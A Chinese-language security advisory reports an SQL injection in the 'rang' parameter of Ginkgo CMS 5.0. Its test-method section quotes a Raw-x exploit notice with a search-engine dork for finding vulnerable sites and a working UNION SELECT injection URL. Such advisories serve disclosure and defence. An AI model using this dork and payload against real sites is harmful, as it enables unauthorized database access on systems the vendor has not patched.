Ginkgo CMS “rang” SQL注入漏洞
发布日期:2013-08-12
更新日期:2013-08-13
受影响系统:
Ginkgo CMS Ginkgo CMS 5.0
描述:
--------------------------------------------------------------------------------
Ginkgo CMS是一款内容管理系统。
Ginkgo CMS 5.0没有正确过滤 index.php 的 "rang" 参数值,即用在SQL查询中,通过注入任意SQL代码,可被利用操作SQL查询。
<*来源:Raw-x
链接:http://secunia.com/advisories/54485/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
__ ___ ________ __ __ ____ __ __
/\ \ /\_ \ /\_____ \ /\ \ /\ \ /\ _`\ /\ \/\ \
\ \ \ __ __\//\ \\/____//'/'\ \ \___ __ ___\ \ \/'\ \ \ \L\ \ \ \ \ \
\ \ \ __/\ \/\ \ \ \ \ //'/' \ \ _ `\ /'__`\ /'___\ \ , < \ \ , /\ \ \ \ \
\ \ \L\ \ \ \_\ \ \_\ \_ //'/'___ \ \ \ \ \/\ \L\.\_/\ \__/\ \ \\`\ __\ \ \\ \\ \ \_\ \
\ \____/\ \____/ /\____\/\_______\\ \_\ \_\ \__/.\_\ \____\\ \_\ \_\/\_\\ \_\ \_\ \_____\
\/___/ \/___/ \/____/\/_______/ \/_/\/_/\/__/\/_/\/____/ \/_/\/_/\/_/ \/_/\/ /\/_____/
############################################################################################
# Exploit Title : Ginkgo CMS SQL injection #
# Date : 31 July 2013 #
# Exploit Author : Raw-x #
# Site : http://www.ginkgo-cms.com/ #
# Tested on : Linux #
############################################################################################
Dork:
~~~ inurl:"index.php?rang=" intext:"Ginkgo CMS" ~~~
Examples:
http://server/index.php?rang=5'/**/div/**/0/**/UNION/**/SELECT/**/1,2,3,4,5-- -
############################################################################################
# Thanks to: lulzhack.ru | zentrixplus.net #
############################################################################################
建议:
--------------------------------------------------------------------------------
厂商补丁:
Ginkgo CMS
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: